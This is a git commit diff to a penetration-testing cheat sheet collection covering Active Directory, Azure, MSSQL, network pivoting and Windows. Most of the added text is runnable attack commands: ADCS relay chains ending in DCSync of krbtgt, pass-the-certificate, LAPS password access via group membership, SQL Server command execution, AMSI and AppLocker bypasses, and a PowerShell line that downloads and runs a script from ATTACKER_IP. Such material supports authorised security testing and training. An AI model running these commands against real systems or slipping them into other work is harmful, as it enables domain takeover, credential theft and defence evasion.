LAPS Access + Pass the Cert + Writeable folder

2024-12-20 03:16:10 +00:00 · 2022-05-31 11:57:44 +02:00 · 2022-05-31 11:57:44 +02:00 · 3066615cde
commit 3066615cde
parent 51aeb90623
6 changed files with 186 additions and 80 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -82,6 +82,7 @@
      - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
      - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
      - [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
      - [Pass-The-Certificate](#pass-the-certificate)
    - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
    - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
      - [GenericAll](#genericall)
@ -230,13 +231,13 @@ Use the correct collector
  # run the collector on the machine using SharpHound.exe
  # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
  # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
-  .\SharpHound.exe -c all -d active.htb -SearchForest
+  .\SharpHound.exe -c all -d active.htb --searchforest
-  .\SharpHound.exe --EncryptZip --ZipFilename export.zip
+  .\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default
-  .\SharpHound.exe -c all,GPOLocalGroup
+  .\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy)
  .\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
-  .\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
+  .\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb
  .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
  .\SharpHound.exe -c all,GPOLocalGroup --searchforest
  # or run the collector on the machine using Powershell
  # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
@ -1467,6 +1468,14 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
      ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
      ```
 #### Grant LAPS Access
 The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password
 ```ps1
 Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local"
 Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local"
 ```
 ### Reading GMSA Password
@ -2230,7 +2239,9 @@ secretsdump.py -k -no-pass target.lab.local
 ### Active Directory Certificate Services
-* Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs`
+* Find ADCS Server
  * `crackmapexec ldap domain.lab -u username -p password -M adcs`
  * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
 * Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
 #### ESC1 - Misconfigured Certificate Templates
@ -2247,8 +2258,10 @@ Exploitation:
    ```ps1
    Certify.exe find /vulnerable
    Certify.exe find /vulnerable /currentuser
-    or
+    # or
    PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
    # or
    certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
    ```
 * Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
    ```ps1
@ -2394,64 +2407,75 @@ Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /
 Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
-* Version 1: NTLM Relay + Rubeus + PetitPotam
+* **Version 1**: NTLM Relay + Rubeus + PetitPotam
-    ```powershell
+  ```powershell
-    impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
+  impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
-    impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
+  impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
-    # For a member server or workstation, the template would be "Computer".
+  # For a member server or workstation, the template would be "Computer".
-    # Other templates: workstation, DomainController, Machine, KerberosAuthentication
+  # Other templates: workstation, DomainController, Machine, KerberosAuthentication
-    # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam 
+  # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam 
-    # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
+  # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
-    git clone https://github.com/topotam/PetitPotam
+  git clone https://github.com/topotam/PetitPotam
-    python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
+  python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
-    python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
+  python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
-    python3 dementor.py <listener> <target> -u <username> -p <password> -d <domain>
+  python3 dementor.py <listener> <target> -u <username> -p <password> -d <domain>
-    python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local
+  python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local
-    # Use the certificate with rubeus to request a TGT
+  # Use the certificate with rubeus to request a TGT
-    Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
+  Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
-    Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt
+  Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt
-    # Now you can use the TGT to perform a DCSync
+  # Now you can use the TGT to perform a DCSync
-    mimikatz> lsadump::dcsync /user:krbtgt
+  mimikatz> lsadump::dcsync /user:krbtgt
-    ```
+  ```
-* Version 2: NTLM Relay + Mimikatz + Kekeo
+* **Version 2**: NTLM Relay + Mimikatz + Kekeo
-    ```powershell
+  ```powershell
-    impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+  impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
-    # Mimikatz
+  # Mimikatz
-    mimikatz> misc::efs /server:dc.lab.local /connect:<IP> /noauth
+  mimikatz> misc::efs /server:dc.lab.local /connect:<IP> /noauth
-    # Kekeo
+  # Kekeo
-    kekeo> base64 /input:on
+  kekeo> base64 /input:on
-    kekeo> tgt::ask /pfx:<BASE64-CERT-FROM-NTLMRELAY> /user:dc$ /domain:lab.local /ptt
+  kekeo> tgt::ask /pfx:<BASE64-CERT-FROM-NTLMRELAY> /user:dc$ /domain:lab.local /ptt
-    # Mimikatz
+  # Mimikatz
-    mimikatz> lsadump::dcsync /user:krbtgt
+  mimikatz> lsadump::dcsync /user:krbtgt
-    ```
+  ```
 * Version 3: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
    ```powershell
    https://github.com/bats3c/ADCSPwn
    adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
    adcspwn.exe --adcs cs.pwnlab.local
    adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
    adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
    adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
-    # ADCSPwn arguments
+* **Version 3**: Kerberos Relay
-    adcs            -       This is the address of the AD CS server which authentication will be relayed to.
+  ```ps1
-    secure          -       Use HTTPS with the certificate service.
+  # Setup the relay
-    port            -       The port ADCSPwn will listen on.
+  sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
-    remote          -       Remote machine to trigger authentication from.
+
-    username        -       Username for non-domain context.
+  # Run mitm6
-    password        -       Password for non-domain context.
+  sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v
-    dc              -       Domain controller to query for Certificate Templates (LDAP).
+  ```
-    unc             -       Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
+
-    output          -       Output path to store base64 generated crt.
+* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
-    ```
+  ```powershell
-* Version 4: Certipy ESC8
+  https://github.com/bats3c/ADCSPwn
  adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
  adcspwn.exe --adcs cs.pwnlab.local
  adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
  adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
  adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
  # ADCSPwn arguments
  adcs            -       This is the address of the AD CS server which authentication will be relayed to.
  secure          -       Use HTTPS with the certificate service.
  port            -       The port ADCSPwn will listen on.
  remote          -       Remote machine to trigger authentication from.
  username        -       Username for non-domain context.
  password        -       Password for non-domain context.
  dc              -       Domain controller to query for Certificate Templates (LDAP).
  unc             -       Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
  output          -       Output path to store base64 generated crt.
  ```
 * **Version 5**: Certipy ESC8
  ```ps1
  certipy relay -ca 172.16.19.100
  ```
@ -2496,6 +2520,29 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
  ```
 #### Pass-The-Certificate
 * Windows
  ```ps1
  # Information about a cert file
  certutil -v -dump admin.pfx
  # From a Base64 PFX
  Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
  ```
 * Linux
  ```ps1
  # Base64-encoded PFX certificate (string) (password can be set)
  gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
  # PEM certificate (file) + PEM private key (file)
  gettgtpkinit.py -cert-pem "PATH_TO_PEM_CERT" -key-pem "PATH_TO_PEM_KEY" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
  # PFX certificate (file) + password (string, optionnal)
  gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
  ```
 ### Dangerous Built-in Groups Usage
 If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
@ -2516,6 +2563,7 @@ Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
 ([adsisearcher]"(AdminCount=1)").findall()
 ```
 #### AdminSDHolder Abuse
 > The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
--- a/Resources/Cloud
+++ b/Resources/Cloud
@ -3,6 +3,7 @@
 ## Summary
 * [Azure Recon Tools](#azure-recon-tools)
 * [Terminology](#terminology)
 * [Enumeration](#enumeration)
    * [Enumerate valid emails](#enumerate-valid-emails)
    * [Enumerate Azure Subdomains](#enumerate-azure-subdomains)
@ -180,6 +181,16 @@
    $ Create-Backdoor, Execute-Backdoor
    ```
 ## Terminology
 > Basic Azure AD terminologies
 * **Tenant**: An instance of Azure AD and represents a single organization.
 * **Azure AD Directory**: Each tenant has a dedicated Directory. This is used to perform identity and access management functions for resources.
 * **Subscriptions**: It is used to pay for services. There can be multiple subscriptions in a Directory.
 * **Core Domain**: The initial domain name <tenant>.onmicrosoft.com is the core domain. It is possible to define custom domain names too.
 ## Enumeration
 ### Enumerate valid emails
@ -1116,3 +1127,4 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta
 * [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
 * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
 * [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
 * [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad)
--- a/Resources/Escape
+++ b/Resources/Escape
@ -146,3 +146,4 @@ firefox irc://127.0.0.1 -P "Test"
 * [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
 * [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
 * [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
 * [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
--- a/Resources/MSSQL
+++ b/Resources/MSSQL
@ -163,12 +163,14 @@ A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
 ```ps1
 Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
 select * from master..sysservers
 ```
 ### Crawl Links for a Specific Instance
 ```ps1
 Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
 select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')')
 ```
 ### Query Version of Linked Database
@ -286,12 +288,21 @@ Prerequisites:
 * CREATE ASSEMBLY permission (or)
 * ALTER ASSEMBLY permission (or)
 The execution takes place with privileges of the **service account**.
 ### Execute commands using CLR assembly
 ```ps1
 # Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
 Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop
 # Execute command using CLR assembly
 Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command "whoami" -Verbose
 Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
 or
 Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose
 # List all the stored procedures added using CLR
 Get-SQLStoredProcedureCLR -Instance <instance> -Verbose
 ```
 ### Manually creating a CLR DLL and importing it
@ -385,6 +396,7 @@ GO
 ## OLE Automation
 * :warning: Disabled by default
 * The execution takes place with privileges of the **service account**.
 ### Execute commands using OLE automation procedures
@ -418,6 +430,9 @@ SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
 ## Agent Jobs
 * The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured.
 * :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job.
 ### Execute commands through SQL Agent Job service
 ```ps1
@ -461,12 +476,21 @@ RECONFIGURE;
 ```ps1
 Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
 EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
 WITH RESULT SETS (([cmd_out] nvarchar(max)))
 ```
 ## R
 ```ps1
 Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
 EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
 WITH RESULT SETS (([cmd_out] text));
 GO
@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'
 ```
 ## Audit Checks
@ -491,8 +515,10 @@ powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS
 ## Find databases that have been configured as trustworthy
-```ps1
+```sql
 Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose 
 SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
 ```
 > The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.
--- a/Resources/Network
+++ b/Resources/Network
@ -30,8 +30,17 @@
 ```powershell
 netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
 netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
 # Forward the port 4545 for the reverse shell, and the 80 for the http server for example
 netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545
 netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80
 # Correctly open the port on the machine
 netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80
 netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80
 netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545
 netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545
 ```
 1. listenaddress – is a local IP address waiting for a connection.
@ -446,3 +455,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
 * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
 * [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
 * [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
 * [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)
--- a/Resources/Windows
+++ b/Resources/Windows
@ -315,15 +315,15 @@ netsh Advfirewall set allprofiles state off
 ### AppLocker Enumeration
 - With the GPO
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
+- `HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2` (Keys: Appx, Dll, Exe, Msi and Script).
 * List AppLocker rules
    ```powershell
    PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
    ```
-* Applocker Bypass
+* AppLocker Bypass
    * By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users
    * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
    * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
    * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
@ -337,23 +337,20 @@ C:\windows\syswow64\windowspowershell\v1.0\powershell
 C:\Windows\System32\WindowsPowerShell\v1.0\powershell
 ```
-Powershell Constrained Mode
+#### Powershell Constrained Mode
-```powershell
+* Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
-# Check if we are in a constrained mode
+* [bypass-clm - PowerShell Constrained Language Mode Bypass](https://github.com/calebstewart/bypass-clm)
-$ExecutionContext.SessionState.LanguageMode
+* [PowerShdll - Powershell with no Powershell.exe via DLL's](https://github.com/p3nt4/PowerShdll): `rundll32.exe C:\temp\PowerShdll.dll,main`
 * Other bypasses
    ```powershell
    PS > &{ whoami }
    powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
    ```
-PS > &{ whoami }
+#### AMSI Bypass
 powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
-# PowerShDLL - Powershell with no Powershell.exe via DLL’s
+Find more AMSI bypass: [here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
 # https://github.com/p3nt4/PowerShdll
 ftp> rundll32.exe C:\temp\PowerShdll.dll,main
 ```
 Example of AMSI Bypass.
 ```powershell
 PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
@ -365,10 +362,22 @@ PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetF
 ```powershell
 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
 C:\Windows\System32\spool\drivers\color
-C:\Windows\Tasks
+C:\Windows\System32\spool\printers
 C:\Windows\System32\spool\servers
 C:\Windows\tracing
 C:\Windows\Temp
 C:\Users\Public
 C:\Windows\Tasks
 C:\Windows\System32\tasks
 C:\Windows\SysWOW64\tasks
 C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
 C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
 C:\Windows\debug\wia
 C:\Windows\registration\crmlog
 C:\Windows\System32\com\dmp
 C:\Windows\SysWOW64\com\dmp
 C:\Windows\System32\fxstmp
 C:\Windows\SysWOW64\fxstmp
 ```
 ## EoP - Looting for passwords